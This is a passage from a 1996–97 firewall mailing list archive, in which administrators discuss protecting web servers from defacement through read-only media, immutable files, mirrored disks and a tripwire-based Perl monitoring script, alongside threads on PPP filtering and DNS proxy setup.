comfortable with jumpering the > hard drive as read-only or mounting a CD-ROM if I ever had to go to such a > level of paranoia. > > Mike Idengren | MEISTER > ---------------------------------+---------------------------------- > Center for Information Technology| Alachua Free-Net IRC Administrator > Stetson University | WorldWide Free-Net IRC Network Coordinator > I agree that CDROM may not be the best R/O media. A R/O HardDrive or some other form of media which has the ability to shut off the Write abilities at the hardware level may be a more cost/time effective means. However, as far as who should be this paranoid thats a whole other issue. I work for a Medical Institution, and the laws that govern patient confidentiality are a nightmare just to read much lest enforce electronically. Some Medical Institutions are wanting to put patient info on line for patient access. So since I live in Reno, alot of so called "mega-stars" may visit the hospital. How much do you think tabloids or whoever would pay to get the clinical data. Just for verbal infomation a doctors have been offered $80,000 (Hear say) for info on one so called "mega-star" who was admitted to one of the local hospitals. Same thing would happen if a government official was admitted. This may seem extreme, but obviosly its happening more and more. This type of personal info will become more and more available via the internet. Law Offices may have their clients info on the Internet for their clients to access. This kind of thing becomes quite dangerous for the instutions. -- Mark Johnson Network Project Manager St. Mary's Regional Med Ctr mark@hercules.reno.nv.us From firewalls-owner Wed Jan 1 12:43:55 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA09193 for firewalls-outgoing; Wed, 1 Jan 1997 12:34:56 -0800 (PST) Received: from pagesz.net (nina.pagesz.net [208.194.157.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA09176 for ; Wed, 1 Jan 1997 12:34:44 -0800 (PST) Received: from jtruitt.pagesz.net (henryIV-82.pagesz.net [208.194.157.82]) by pagesz.net (8.8.2/8.7.3) with SMTP id PAA26231; Wed, 1 Jan 1997 15:34:00 -0500 Message-Id: <199701012034.PAA26231@pagesz.net> X-Sender: jtruitt@mailhost.pagesz.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 01 Jan 1997 15:32:28 -0500 To: Paul Ferguson From: Jim Truitt Subject: Re: Denial of service (was Re: Air Force Web Site Hacked) Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [snip] >So, what can you do? Log, log, log. And more logging. And get >to know the security administrator upstream from you. > >- paul [snip] This is simple, but excellent advice. Users of PGP are always talking about a "web of trust". Perhaps what is needed is a web of trust between security admins. Just a thought. Jim truitt From firewalls-owner Wed Jan 1 14:03:36 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA14183 for firewalls-outgoing; Wed, 1 Jan 1997 13:48:16 -0800 (PST) Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA14173 for ; Wed, 1 Jan 1997 13:48:09 -0800 (PST) Received: from clonvick-pc.cisco.com (c1robo14.cisco.com [171.68.13.14]) by diablo.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id NAA08670; Wed, 1 Jan 1997 13:44:23 -0800 (PST) Message-Id: <2.2.32.19970101213404.0075d8bc@diablo.cisco.com> X-Sender: clonvick@diablo.cisco.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 01 Jan 1997 15:34:04 -0600 To: Thomas Leitner , Paul Ferguson From: Chris Lonvick Subject: Re: Air Force Web Site Hacked Cc: Mark Johnson , Gene Lee , Dale Drew , Michael Idengren , "firewalls@GreatCircle.COM" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, There have been several interesting solutions offered here to address the Web server hacking problem. The ones I've seen seem to focus on either making the content static, or on providing secure methods of updating the content from a more secured machine further within the organization. This may work well enough for organizations which are providing the content in a "one way" method: _from_ the organization _to_ the surfers. However, this doesn't appear to be the model for the future development of the Web/Internet. From marketing blabs and magazine articles, it appears that the largest driver of bi-directional content exchange is going to be electronic transactions. For those companies which aren't planning on doing this anytime soon, I still think that they would want to get "feedback" (aka - demographics research) from people visiting their site. I, personally, would like to get a transaction record onto a non-volatile media pretty quickly. I'd say that setting up a Web server on the Internet is not something that you can do, and then just walk away from. You must accept the responsibility of constantly maintaining security on exposed systems like these. I can't offer anything more than to say that the traditional security methods, which have also been mentioned here, are probably the best. Thanks, Chris Lonvick Cisco Systems Consulting Engineering Houston, TX, USA +1-713-778-5663 At 02:59 PM 1/1/97 +0100, Thomas Leitner wrote: > >On Tue, 31 Dec 1996, Paul Ferguson wrote: > >> Frankly, I think the suggestion of using non-writable media (ie. CD-ROMs) >> is rather unpractical. Most sufficiently interesting web sites contain >> ever-changing & constantly updated information, such as news, various >> daily features, etc. >> >> Not a practical solution. > >O.K. If you want to be really secure and still updateable, do this: > >1.) Use two mirrored disks. One is mounted read-only one is mounted > read/write. The two disks can contain not only the WEB data but > the whole operating system as well. As someone already noted > before: Linux (and I'm sure other Unixes as well) can be setup > to run from an RO media. > >2.) When updates are required: Mount the second mirror disk r/w, > do the update and reboot from the second mirror disk which is > now mounted read-only. If the system is setup properly, > the reboot time and thus the outage time can be kept quite low. > >3.) When the system comes up, mount the first disk RW and apply > the updates as well to keep the disk contents in sync. > >If the outage during the update is unacceptable what about using >two mirror machines: One standby and RW for updates and one >on-line running RO. After the update, machines could swap their >functions immediately. Sure: This would require some fancy IP >address setup. > >Tom > >-------------------------------------------------------------------------- >T o m L e i t n e r Dept. of Communications > Graz University of Technology, >e-mail : tom@finwds01.tu-graz.ac.at Inffeldgasse 12 >Phone : +43-316-873-7455 A-8010 Graz / Austria / Europe >Fax : +43-316-463-697 >Home page : http://wiis.tu-graz.ac.at/people/tom.html >PGP public key on : ftp://wiis.tu-graz.ac.at/pgp-keys/tom.asc or send >mail with subject "get Thomas Leitner" to pgp-public-keys@keys.pgp.net >-------------------------------------------------------------------------- > > > From firewalls-owner Wed Jan 1 14:14:18 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA15101 for firewalls-outgoing; Wed, 1 Jan 1997 14:09:30 -0800 (PST) Received: from reflections.mindspring.com (reflections.mindspring.com [204.180.142.192]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA15084 for ; Wed, 1 Jan 1997 14:09:19 -0800 (PST) Received: from localhost (lists@localhost) by reflections.mindspring.com (8.7.1/8.7.1) with SMTP id RAA10674; Wed, 1 Jan 1997 17:06:07 -0500 Date: Wed, 1 Jan 1997 17:06:06 -0500 (EST) From: Todd Graham Lewis To: Marc Goldburg cc: Firewalls Mailing List Subject: Re: packet filtering on PPP interfaces In-Reply-To: <199612242018.MAA15154@array.arraycomm.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 24 Dec 1996, Marc Goldburg wrote: > We're planning to use a Sparc 20 with an attached modem pool as a dialup > ppp server for our telecommuters. Seems overkill to me; why not a $1k x86 box? > Is anyone aware of ppp implementation that include packet filtering? Or of > (nit-based?) packet filtering implementations that could be applied to a > ppp interface under Solaris 1 (Solaris 1.2 to be exact)? In a former job, I used Morningstar's PPP implementation for Solaris, and it was very good. It included ACLs of the type you describe. I'm not sure whether it's still available in general, or for Solaris 1 (ick!) in particular. __ Todd Graham Lewis Linux! Core Engineering Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 From firewalls-owner Wed Jan 1 14:28:59 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA14602 for firewalls-outgoing; Wed, 1 Jan 1997 14:01:44 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA14595 for ; Wed, 1 Jan 1997 14:01:37 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id OAA17276; Wed, 1 Jan 1997 14:00:17 -0800 Received: from nsco.network.com(129.191.1.1) by mycroft via smap (V1.3mjr) id sma017264; Wed Jan 1 13:54:50 1997 Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA14630; Wed, 1 Jan 97 15:59:16 CST Received: by mnbp.network.com with Microsoft Mail id <32CADC14@mnbp.network.com>; Wed, 01 Jan 97 15:50:12 CST From: Craig McLellan To: Dale Drew , Mark Johnson Cc: Christopher Klaus , firewalls , Michael Idengren Subject: RE: WWW Gaffiti Immunity (Off Topic) Date: Wed, 01 Jan 97 15:49:00 CST Message-Id: <32CADC14@mnbp.network.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Why not just buy a tool such as web stalker from Haystack ??? RGRDS....clm ---------- From: firewalls-owner To: Mark Johnson; Dale Drew Cc: Michael Idengren; Christopher Klaus; firewalls Subject: WWW Gaffiti Immunity (Off Topic) Date: December 31, 1996 14:57 >> I don't see how CDROM provides significant advantages on a WEB server >> "graffiti" attack. In order to avoid graffiti try something like this: 1)Write a program that checks the size/date of the WWW directory If it fails have it Kill the WWW server and send email to the admin. 2)Setup a CRON job to run the program every 15 min. If a hacker is good enough they will find it, but who would be looking for such a random thing? Just make sure you change the size whenever you make a change to your documents. As for CD-ROM WWW sites, I believe the term "Link-rot" comes to mind. Good Luck, Brad Providing The Power Of Operable Networks Brad Daugherty - Associate Network Systems Engineer PHONE:(630)942-5770 PAGE:(800)467-1467 FAX:(630)545-0068 Lifetime: From firewalls-owner Wed Jan 1 14:50:43 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA16050 for firewalls-outgoing; Wed, 1 Jan 1997 14:29:53 -0800 (PST) Received: from ian.south-border.com (ian.mnsinc.com [206.239.152.197]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA16013 for ; Wed, 1 Jan 1997 14:29:33 -0800 (PST) Received: (qmail 6547 invoked from network); 1 Jan 1997 22:28:56 -0000 Received: from sparc.south-border.com (128.26.242.90) by sunspot-thin.south-border.com with SMTP; 1 Jan 1997 22:28:56 -0000 Received: from sparc.south-border.com (localhost [127.0.0.1]) by sparc.south-border.com (8.8.4/8.8.4) with ESMTP id RAA02629; Wed, 1 Jan 1997 17:28:53 -0500 (EST) Message-Id: <199701012228.RAA02629@sparc.south-border.com> To: firewalls@GreatCircle.COM cc: Brad Daugherty , Mark Johnson , Dale Drew , Michael Idengren , Christopher Klaus Subject: Re: WWW Gaffiti Immunity (Off Topic) In-reply-to: Your message of "Wed, 01 Jan 1997 09:35:47 EST." <199701011435.JAA01074@sparc.south-border.com> Date: Wed, 01 Jan 1997 17:28:52 -0500 From: The Unseen Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Corrected an obvious error... 8-) here's the latest one. please let me know if you find other errors.... Ian -------------- #!/usr/local/bin/perl # # The purpose of this script is to help secure our WWW files # from grafitti. We are going to use tripwire to help us keep # track of file signatures and alert us when there are major # inconsistancies that may result from someone trying to hack # our site. # # Ideal config consists of a WWW server mounting via NFS the # document tree. This script is intended to be run on the # NFS server. # # Feel free to distribute and/or alter this script as needed. # But be kind and email me the changes... ian@south-border.com package WWWcheck; $Alert=0; @SendData=(); $DoBoth=0; $DoNFS=0; $DoRmHttp=0; # Specify the email address of the admin you want information # mailed to. $AdminUser="securityuser"; # Specify the metheod of emailing. $SendmailCMD="/usr/lib/sendmail -t"; # The following variables define where tripwire is. Specify # the correct database and config files to be given to tripwire # as options. Tripwire will run in quiet mode to eliminate # pass babble. $TripCMD="/place/to/bin/tripwire"; $TripDatabase="/place/to/tripwire/www.database"; $TripConfigFile="/place/to/tripwire/WWW.conf"; # If your WWW server mounts it's document tree via NFS from # a hardened server and this script and tripwire run on the # NFS server, set DoNFSshare to 1. This will unshare the NFS # directory after a grace period defined below. $DoNFSshare=1; $NFSunsharecmd="/usr/sbin/unshare"; $NFSwwwdir="/place/to/real/NFS/server/WWW"; # Change this to 1 to kill the httpd server remotely based on # the outcome of tripwire. Be sure to review RemoteHttpKill, # RemoteHost, and RemoteCMD. I like ssh because of the key # exchange. $DoRemoteKill=0; # These are used when DoRemoteKill is set to 1 $RemoteCMD="/opt/PUBsshd/bin/ssh"; $RemoteHost="WWW"; $RemoteHttpKill="/etc/init.d/httpd stop"; # This defines how long to wait gracefully before proceeding # with killing the httpd server and NFS server. $SleepTime="sleep 3600"; #<----you do not need to change anything below here---> # Issue tripwire command with options. Compile a list of # changes that have occured from the last update of the # tripwire database. Save these modifications to be sent # as a notification to the admin. sub BuildTripDatabase { open(Tripdata,"$TripCMD -d $TripDatabase -c $TripConfigFile -q|"); while() { split; chop; push(@SendData,$_); } } sub AlertAdmin { if(@SendData == " ") { return; } open(ALERT,"|$SendmailCMD"); print ALERT "To:$AdminUser\n"; print ALERT "cc:\n"; print ALERT "subject: WWW server Document tree\n"; print ALERT "-------\n"; print ALERT "Has changed since the last tripwire database update. Here\n"; print ALERT "is a summery of the output from tripwire run at \n\n\n"; for(@SendData) { print ALERT "$_\n"; } print ALERT "\nThe following actions will be taken...\n\n"; if($DoNFSshare == '1' && $DoRemoteKill == '1') { print ALERT "Your WWW server mounts it's document tree via NFS from\n"; print ALERT "this server and you have elected to kill the remote httpd\n"; print ALERT "daemon running on the WWW server. The following command will\n"; print ALERT "issued:\n\n"; print ALERT "$SleepTime ; $NFSunsharecmd $NFSwwwdir ; $RemoteCMD $RemoteHost '($RemoteHttpKill)\n\n"; close(ALERT); $DoBoth=1; return; } if($DoNFSshare == '1') { # print STDERR `$SleepTime ; $NFSunsharecmd $NFSwwwdir 2>1 &`; print ALERT "Your WWW server is mounting it's document tree via an NFS\n"; print ALERT "server which is this host according to variables set. The\n"; print ALERT "following command will be issued:\n\n"; print ALERT "$SleepTime ; $NFSunsharecmd $NFSwwwdir\n\n"; $DoNFS=1; } if($DoRemoteKill == '1') { # print STDERR `$RemoteCMD $RemoteHost '($SleepTime ; $RemoteHttpKill) &'`; print ALERT "According to our options you have elected to disable httpd\n"; print ALERT "service on the WWW server. the following command will be\n"; print ALERT "issued:\n\n"; print ALERT "$RemoteCMD $RemoteHost '($SleepTime ; $RemoteHttpKill)\n\n"; $DoRmHttp=1; } if($DoNFSshare == '0' && $DoRemoteKill == '0') { print ALERT "Although we have detected differences that may indicate an\n"; print ALERT "attack, options set tell us that we are to take no action\n"; print ALERT "in response. YOU MUST CHECK to see if this is really the\n"; print ALERT "intended reaction to the tripwire output!\n\n"; } close(ALERT); } sub PerformKill { if($DoBoth) { print STDERR `$SleepTime ; $NFSunsharecmd $NFSwwwdir ; $RemoteCMD $RemoteHost '($RemoteHttpKill)'`; return; } if($DoNFS) { print STDERR `($SleepTime ; $NFSunsharecmd $NFSwwwdir)`; } if($DoRmHttp) { print STDERR `$SleepTime ; $RemoteCMD $RemoteHost '($RemoteHttpKill)'`; } } sub main { &BuildTripDatabase(); &AlertAdmin(); &PerformKill(); } package main; &WWWcheck'main(); From firewalls-owner Wed Jan 1 16:13:52 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA24273 for firewalls-outgoing; Wed, 1 Jan 1997 16:09:42 -0800 (PST) Received: from reflections.mindspring.com (reflections.mindspring.com [204.180.142.192]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA24263 for ; Wed, 1 Jan 1997 16:09:35 -0800 (PST) Received: from localhost (lists@localhost) by reflections.mindspring.com (8.7.1/8.7.1) with SMTP id TAA11101; Wed, 1 Jan 1997 19:06:26 -0500 Date: Wed, 1 Jan 1997 19:06:25 -0500 (EST) From: Todd Graham Lewis To: Robert Hanson cc: Firewall Mailing List Subject: Re: Christopher Klaus and ISS In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 31 Dec 1996, Robert Hanson wrote: > no disrespect intended to you Todd, yet.... > > kill! maime! shoot! my goodness... we are all capitalist pigs... what > makes anyone better than anyone else standing next to them... I not only like corporations, I work for one. Believe it or not, I don't even have a problem with vendors discussing their products on the list. Those who offer help to newbies, contribute to technical discussions, etc., are more than entitled to mention once in a while "BTW (disclaimer: I work for 'em), our product X is designed to address this problem", or even to say "In light of the discussion last month, I thought that the list might be interested in our new product, SuperBlammo4000." What I don't appreciate are bone-headed sales pitches coming from people who never participate in the discussions on the list, and whose sole purpose is to use the list as a free advertising channel. I don't think that this is too far off the mark, and the fact that Klaus is a complete asshole just makes the decision that much easier. (BTW, I'm sorry I wasn't able to participate in the discussion about Linux firewalls. I was visiting family during the holidays.) __ Todd Graham Lewis Linux! Core Engineering Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 From firewalls-owner Wed Jan 1 20:58:57 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA04833 for firewalls-outgoing; Wed, 1 Jan 1997 20:51:23 -0800 (PST) Received: from kic.or.jp (server.kic.or.jp [202.239.136.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id UAA04798 for ; Wed, 1 Jan 1997 20:51:13 -0800 (PST) Received: from ppp74.kic.or.jp (ppp74.kic.or.jp [202.239.136.94]) by kic.or.jp with SMTP id NAA06408; Thu, 2 Jan 1997 13:43:00 +0900 Received: by ppp74.kic.or.jp with Microsoft Mail id <01BBF8B3.E469E440@ppp74.kic.or.jp>; Thu, 2 Jan 1997 13:50:19 +0900 Message-ID: <01BBF8B3.E469E440@ppp74.kic.or.jp> From: "Jason T. Luttgens" To: "firewalls@greatcircle.com" , "'Norm Laudermilch'" Subject: RE: Air Force Web Site Hacked Date: Thu, 2 Jan 1997 13:50:18 +0900 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Why not get Practical Unix and Internet Security from O'Reilly and do what is says. I bet if everyone disabled stupid services (on unix hosts), installed TCP wrappers to allow telnets from limited IP addresses, did Cisco's recommendations on preventing IP spoofing, used Linux or another free x86 Unix and ssh to telnet in, and subscribed to security mailing lists to keep up on things, these incidents would slow down a LOT...how many people out there have done this to their unix host?? Get to work you system admins! All this is your fault...... ---------- From: Norm Laudermilch[SMTP:norm@UU.NET] Sent: Wednesday, January 01, 1997 8:57 AM To: firewalls@greatcircle.com Subject: Re: Air Force Web Site Hacked [from Michael Idengren:] > I don't know about the rest of you but I agree with the idea of putting a > webserver on a CD-ROM. [from Thomas Leitner:] > why not just put it on a separate disk which is mounted > read-only? [from Dale Drew:] > Using a CDROM web-server doesn't provide resistance to an > attacker who gains access to the system as ROOT... Keep in mind that this entire thread assumes that the attacker will *not* take an easier approach, such as compromising the DNS records that point to the server. In this case, the attacker can create any web content they like, spend all the time in the world creating it, and then quickly convince the DNS servers that www.foo.com now resolves to the new (fake) address. Securing your www server is just a first (although important) step. I do think read-only media is an interesting idea, by the way :) Dale is right though, there are still vulnerabilities. Personally, I like the idea of marking the files immutable myself. This way, even root can't change the content unless the machine is brought down into single-user mode. Not sure how many other operating systems support this other than (the great) BSDI though. Happy new year (2 minutes to go...), Norm ---------------------------------------------------------------------- Have you cleaned your packet filter lately? - Josh Osborne ---------------------------------------------------------------------- Norm Laudermilch E-mail: norm@uu.net Manager, Information Security Phone: 703-206-5952 UUNET Technologies, Inc. 3060 Williams Drive Fairfax, VA 22031-4648 ---------------------------------------------------------------------- From firewalls-owner Thu Jan 2 00:14:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA12383 for firewalls-outgoing; Thu, 2 Jan 1997 00:04:46 -0800 (PST) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA12376 for ; Thu, 2 Jan 1997 00:04:38 -0800 (PST) Received: by dtcro002.apogee-com.fr; id JAA03427; Thu, 2 Jan 1997 09:04:50 +0100 (MET) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (3.2) id xma003425; Thu, 2 Jan 97 09:04:41 +0100 Received: from ingpc001.apogee-com.fr by (4.1/SMI-4.1) id AA18713; Thu, 2 Jan 97 09:02:03 +0100 Message-Id: <3.0.32.19970102090259.006f63d8@apogee1.apogee-com.fr> X-Sender: jfzw@apogee1.apogee-com.fr X-Mailer: Windows Eudora Pro Version 3.0 Demo (32) Date: Thu, 02 Jan 1997 09:03:03 +0100 To: "R. McMahon" , firewalls@GreatCircle.COM From: Jean-Francois ZWOBADA Subject: Re: DNS Proxy and Internal Root Name Server Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 16:59 31/12/1996 -0500, R. McMahon wrote: >Background: >I am looking at setting up a DNS proxy using "forwarders" and "slave" >lines in by /etc/named.boot file as described in the "Building >Firewalls" and "DNS and BIND" books by O'Reilly. However, I want to do >this where I can maintain an internal Root name server. For resolution >of domain names outside the internal top-level domains, I would like the >proxy name server (which will have an "external" domain name) be the >only name server queried by the internal root name server and having >this proxy be the only host to query external name servers. (I would >set up UDP port 53 filtering on the router.) > >Problem: >One problem I thought of concerns the mitigation between the internal >root name server and the forwarders/slave lines. If a subordinate >domain name server queries the root name server for an "outside" domain, >how would it know to forward the query to the proxy (being that it is a >internal root name server)? I could have my subordinate top-level >domain name serves query the proxy directly by putting forwarders line >in it's /etc/named.boot, however, this would bypass the internal root >structure. It seems to be straight forward w/o an internal root name >server, however, I need to maintain these root name server. Can anyone >help. > >Thanks, > >rwm > The problem with an internal root server is that it wont take any account of your forwarders & slave options because it is said to be a root server. The only solution I think of is adding the noforward patch in the named daemons of the first level name servers you have under your root server. You just have to specify all the domains known by your internal root nameserver so that your lower level nameserver would query it but would forward to your proxy for everything else. Hope this helps Jean-Francois PS: the noforward patch is available for BIND on ftp.vix.com (but I can't remember the path...) From firewalls-owner Thu Jan 2 04:59:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA22479 for firewalls-outgoing; Thu, 2 Jan 1997 04:49:52 -0800 (PST) Received: from smtpgw.adtdata.com (smtpgw.adtdata.com [204.183.205.252]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id EAA22465 for ; Thu, 2 Jan 1997 04:49:42 -0800 (PST) Received: from ADT-Message_Server by smtpgw.adtdata.com with Novell_GroupWise; Thu, 02 Jan 1997 07:50:48 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 01 Jan 1997 15:10:33 -0500 From: Brian Stone To: mark@hercules.reno.nv.us, genel@inforamp.net, ddrew@mci.net Cc: firewalls@GreatCircle.COM, cklaus@iss.net, midengre@stetson.edu Subject: RE: Air Force Web Site Hacked -Reply Mime-Version: 1.0 Content-Type: text/plain Content-Disposition: inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Compaq Corp. provides a bootable "Smart Start" OS installation CD with every Proliant 5000 (many people are using these as Netware/IntranetWare or NT file/print/app/web servers). I'm not sure how they do it, I believe its a function of the BIOS that "knows" about the CD as a bootable media (probably searches A:, C:, D: etc. for boot files) if nothing is in A: and the hard disk isn't partioned/formatted yet it boots from the CD and steps you through installing the rest of the drivers (hard drive/NIC/etc.) and the OS you purchased! It's cool and I think they've been doing it for awhile. Brian Stone bstone@KnowledgeSoft.com >>> Gene Lee 12/31/96 04:00pm >>> On Tuesday, December 31, 1996 2:41 PM, Mark Johnson[SMTP:mark@hercules.reno.nv.us] wrote: >I have not set one up yet(Planned for July), but I believe you can have >a totally CDROM machine, at least using Novell or NT. Bootable CDROMs >and all data on CDROM so you would not have any writable media. > >Can anyone confirm of deny my thoughts? Slackware Linux has a useable filesystem on CD-ROM, however the boot partition still has to be HD or Floppy. One thing that puzzles me about bootable media is if you have a bootable CD, how does it install the drivers for itself to read from the CD to actually start reading the boot sector (which supposedly is on the CD). Kind of a Catch-22. Forgive me, but I'm no PC guru... -- Gene Lee genel@inforamp.net genelee@vnet.ibm.com From firewalls-owner Thu Jan 2 05:19:44 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA23064 for firewalls-outgoing; Thu, 2 Jan 1997 05:07:24 -0800 (PST) Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA23057 for ; Thu, 2 Jan 1997 05:07:09 -0800 (PST) Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id ha135519 for ; Thu, 2 Jan 1997 14:06:43 +0100 Received: by ppp67.sbbs.se with Microsoft Mail id <01BBF8B5.F541F490@ppp67.sbbs.se>; Thu, 2 Jan 1997 14:05:07 +0100 Message-ID: <01BBF8B5.F541F490@ppp67.sbbs.se> From: Sebastian Stache To: "'Firewalls@GreatCircle.COM'" Subject: Re: Air Force Web Site Hacked Date: Thu, 2 Jan 1997 14:04:14 +0100 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="---- =_NextPart_000_01BBF8B5.F54501D0" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------ =_NextPart_000_01BBF8B5.F54501D0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit I'm getting unnerved by the fact that not only have those sites indeed been hacked, but noone seems to be surpised. What techniques were used? To alter the html files, someone obviously managed to achieve file overwrite rights (at the very least). If I ran a military/intelligence site for the public, I would think it natural to use a dedicated webserver, with only the servers required to make maintainence feasable running (ie no smtp, telnet etc). Also, I could think of no reasons to allow anything but html sessions from the outside (since it was dedicated). The level of security problems is often the inverse of the level of flexibility and functionality. In this case it seems to me that the flexibilty/functionality can be reduced to a point of mere viewing services, which is why it would be possible to put the files on cdrom (which by the way doesn't help at all if the hacker has gained root access since he can simply point to another location). So, did the hacked hosts have ftp daemons running, with the firewall allowing outside access? Telnet? Rsh? Or are there html specific inherent weaknesses (even without java etc)? Regards Sebastian Stache Lund, Sweden ------ =_NextPart_000_01BBF8B5.F54501D0 Content-Type: application/ms-tnef Content-Transfer-Encoding: base64 eJ8+IgcNAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEEkAYAOAEAAAEAAAAMAAAAAwAAMAQAAAAL AA8OAAAAAAIB/w8BAAAAUQAAAAAAAACBKx+kvqMQGZ1uAN0BD1QCAAAAAEZpcmV3YWxsc0BHcmVh dENpcmNsZS5DT00AU01UUABGaXJld2FsbHNAR3JlYXRDaXJjbGUuQ09NAAAAAB4AAjABAAAABQAA AFNNVFAAAAAAHgADMAEAAAAaAAAARmlyZXdhbGxzQEdyZWF0Q2lyY2xlLkNPTQAAAAMAFQwBAAAA AwD+DwYAAAAeAAEwAQAAABwAAAAnRmlyZXdhbGxzQEdyZWF0Q2lyY2xlLkNPTScAAgELMAEAAAAf AAAAU01UUDpGSVJFV0FMTFNAR1JFQVRDSVJDTEUuQ09NAAADAAA5AAAAAAsAQDoBAAAAAgH2DwEA AAAEAAAAAAAABAs8AQSAAQAeAAAAUmU6IEFpciBGb3JjZSBXZWIgU2l0ZSBIYWNrZWQAjwkBBYAD AA4AAADNBwEAAgAOAAQADgAEAPsAASCAAwAOAAAAzQcBAAIADgAEAA4ABAD7AAEJgAEAIQAAAEFC RTUyODU0OTk2NEQwMTE5NDAzMDBBMDI0RDg1NUVFAPkGAQOQBgDcBQAAFAAAAAsAIwAAAAAAAwAm AAAAAAALACkAAQAAAAMALgAAAAAAAwA2AAAAAABAADkA0O4ddK34uwEeAHAAAQAAAB4AAABSZTog QWlyIEZvcmNlIFdlYiBTaXRlIEhhY2tlZAAAAAIBcQABAAAAFgAAAAG7+K10HFQo5a9kmRHQlAMA oCTYVe4AAB4AHgwBAAAABQAAAFNNVFAAAAAAHgAfDAEAAAAMAAAAemViQHNiYnMuc2UAAwAGEH56 ByQDAAcQyQMAAB4ACBABAAAAZQAAAElNR0VUVElOR1VOTkVSVkVEQllUSEVGQUNUVEhBVE5PVE9O TFlIQVZFVEhPU0VTSVRFU0lOREVFREJFRU5IQUNLRUQsQlVUTk9PTkVTRUVNU1RPQkVTVVJQSVNF RFdIQVRURUMAAAAAAgEJEAEAAABUBAAAUAQAAJwGAABMWkZ10c09Hv8ACgEPAhUCpAPkBesCgwBQ EwNUAgBjaArAc2V07jIGAAbDAoMyA8YHEwKDIjMPemhlbAMgRGwaZwKDNARGAgBwcnHcMSAIVQey AoB9CoAIz0UJ2TsYbzI1NRmPZXgxMjgCgAqBDbELYG7wZzEwNRQgCwoVwQvwBRLwYxLgIEknbSAK ZxIAdAuAZyB1bgpuBJB2CYAgYnkgcnQU8CBmANAFQCAgYZkFQG5vBUACIGx5CoVXEcAfsCARbxHw IACQdD8HkQuADbAfwgnhIeFja7UJgCwf4HUg4gIgZQqFyRHwZW0EIHRvI2EikG0IcHAEAAmALgqF CoVXbyDCIsARsAMAcQpQBCB3iwSQIEB1JlE/IFQlsA8HQCLABcAgImh0bWxdCoVmAxAHkCQgcwNw ZaMkoSEwYnZpCGBzIWB6IAOBYR7gH9AloQDQaJ8IkB+wKjkhMB+wcncFELUiwCAFEGcp8AQgKCeS DyAxLiEgACrAYXN0KbkmhklmHpAuoAORYSwg5wMQIrAKwHkvC4AiwBUQ+y7ACfBjIoQgUAWxICEK hWRwdQJgaWMkIDEAd80IYGwskS0Abmsi8CDh/yDQCHAHQCWSKMEpQAqFDbDeZDRQINAfwShwYhHw 